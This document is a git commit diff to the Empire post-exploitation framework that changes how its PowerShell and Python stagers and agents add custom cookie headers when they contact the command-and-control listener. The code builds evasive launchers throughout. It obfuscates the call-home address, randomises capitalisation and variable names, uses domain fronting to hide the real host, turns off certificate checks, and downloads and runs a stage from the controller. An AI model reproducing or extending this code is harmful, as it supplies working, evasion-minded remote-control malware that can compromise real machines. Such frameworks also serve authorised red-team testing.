Fix for 1142 complete

2018-06-04 22:17:03 -04:00 · 2018-06-04 22:17:03 -04:00 · f9018fc637
parent 516a7d8c1b
commit f9018fc637
3 changed files with 60 additions and 26 deletions
--- a/data/agent/agent.ps1
+++ b/data/agent/agent.ps1
@ -140,7 +140,6 @@ function Invoke-Empire {
    # keep track of all background jobs
    #   format: {'RandomJobName' : @{'Alias'=$RandName; 'AppDomain'=$AppDomain; 'PSHost'=$PSHost; 'Job'=$Job; 'Buffer'=$Buffer}, ... }
    $Script:Jobs = @{}
-    $Script:Downloads = @{}
    # the currently imported script held in memory
    $script:ImportedScript = ''

--- a/data/agent/stagers/http.ps1
+++ b/data/agent/stagers/http.ps1
@ -111,14 +111,17 @@ function Start-Negotiate {
    if ($customHeaders -ne "") {
        $headers = $customHeaders -split ',';
        $headers | ForEach-Object {
-            $headerKey = $_.split(':')[0];
-            $headerValue = $_.split(':')[1];
+            $headerKey = $($_ -split ':')[0];
+            $headerValue = $($_ -split ':')[1];
            #If host header defined, assume domain fronting is in use and add a call to the base URL first
            #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
            if ($headerKey -eq "host"){
-                try{$ig=$WC.DownloadData($s)}catch{}};
+                try{$ig=$WC.DownloadData($s)}catch{};
+            }
+
            $wc.Headers.Add($headerKey, $headerValue);
        }
+        
    }
    $wc.Headers.Add("User-Agent",$UA);
    
@ -217,7 +220,9 @@ function Start-Negotiate {
            #If host header defined, assume domain fronting is in use and add a call to the base URL first
            #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
            if ($headerKey -eq "host"){
-                try{$ig=$WC.DownloadData($s)}catch{}};
+                try{$ig=$WC.DownloadData($s)}catch{};
+            }
+
            $wc.Headers.Add($headerKey, $headerValue);
        }
    }
--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@ -333,10 +333,6 @@ class Listener:
                    # allow for self-signed certificates for https connections
                    stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"

-                if userAgent.lower() != 'none':
-                    stager += helpers.randomize_capitalization('$wc.Headers.Add(')
-                    stager += "'User-Agent',$u);"
-
                if userAgent.lower() != 'none':
                    stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
                    stager += "'User-Agent',$u);"
@ -393,6 +389,7 @@ class Listener:
                b64RoutingPacket = base64.b64encode(routingPacket)

                stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';"
+                cookieString = "{}={};".format(cookie, b64RoutingPacket)
                
                #Add custom headers if any
                if customHeaders != []:
@ -404,12 +401,16 @@ class Listener:
                        if headerKey.lower() == "host":
                            stager += helpers.randomize_capitalization("try{$ig=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser)}catch{};")

+                        if headerKey.lower() == "cookie":
+                            cookieString += "{};".format(headerValue)
+                            continue
+
                        stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
                        stager += "\"%s\",\"%s\");" % (headerKey, headerValue)

                # add the RC4 packet to a cookie
                stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
-                stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket)
+                stager += "\"Cookie\",\"%s\");" % (cookieString)

                stager += helpers.randomize_capitalization("$data=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser+$t);")
                stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
@ -461,16 +462,24 @@ class Listener:
                launcherBase += "req=urllib2.Request(server+t);\n"
                # add the RC4 packet to a cookie
                launcherBase += "req.add_header('User-Agent',UA);\n"
-                launcherBase += "req.add_header('Cookie',\"%s=%s\");\n" % (cookie,b64RoutingPacket)
+                cookieString = "{}={};".format(cookie,b64RoutingPacket)
+                

                # Add custom headers if any
                if customHeaders != []:
                    for header in customHeaders:
                        headerKey = header.split(':')[0]
                        headerValue = header.split(':')[1]
+
+                        if headerKey.lower() == "cookie":
+                            cookieString += "{};".format(headerValue)
+                            continue
+
                        #launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
                        launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
                
+                launcherBase += "req.add_header('Cookie',\"%s\");\n" % (cookieString)
+

                if proxy.lower() != "none":
                    if proxy.lower() == "default":
@ -722,6 +731,20 @@ class Listener:
        This is so agents can easily be dynamically updated for the new listener.
        """

+        profile = listenerOptions['DefaultProfile']['Value']
+        customHeaders = profile.split('|')[2:]
+        cookieString = ""
+
+        if customHeaders != []:
+            for header in customHeaders:
+                headerKey = header.split(':')[0]
+                headerValue = header.split(':')[1]
+
+                if headerKey.lower() == "cookie":
+                    cookieString += "{};".format(headerValue)
+                    
+
+
        if language:
            if language.lower() == 'powershell':

@ -743,6 +766,13 @@ class Listener:
                                $RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
                                $RoutingCookie = [Convert]::ToBase64String($RoutingPacket)

+                                #if there is an additional custom cookie value, add it to the webclient object.
+                                if($script:Headers['Cookie'] -ne $null) {
+                                    $cookieValueString = "$RoutingCookie;$($script:Headers['Cookie']);"
+                                }
+                                else {
+                                    $cookieValueString = $RoutingCookie
+                                }
                                # build the web request object
                                $"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient

@ -755,7 +785,8 @@ class Listener:

                                $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("User-Agent",$script:UserAgent)
                                $script:Headers.GetEnumerator() | % {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
-                                $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("Cookie",\"""" + cookie + """=$RoutingCookie")
+                                $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Cookie",\"""" + cookie + """=$cookieValueString")
+                                
                                
                                # choose a random valid URI for checkin
                                $taskURI = $script:TaskURIs | Get-Random
@ -797,7 +828,6 @@ class Listener:

                                $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add('User-Agent', $Script:UserAgent)
                                $Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
-
                                try {
                                    # get a random posting URI
                                    $taskURI = $Script:TaskURIs | Get-Random
@ -847,7 +877,7 @@ def send_message(packets=None):
        #   meta TASKING_REQUEST = 4
        routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
        b64routingPacket = base64.b64encode(routingPacket)
-        headers['Cookie'] = \"""" + cookie + """=%s" % (b64routingPacket)
+        headers['Cookie'] = \"""" + cookie + """=%s;{}" % (b64routingPacket)

    taskURI = random.sample(taskURIs, 1)[0]
    requestUri = server + taskURI
@ -861,7 +891,7 @@ def send_message(packets=None):
        missedCheckins = missedCheckins + 1
        #if signaled for restaging, exit.
        if HTTPError.code == 401:
-            sys.exit(0)
+            pass

        return (HTTPError.code, '')

@ -871,7 +901,7 @@ def send_message(packets=None):
        return (URLerror.reason, '')

    return ('', '')
-"""
+""".format(cookieString)
                return updateServers + sendMessage

            else: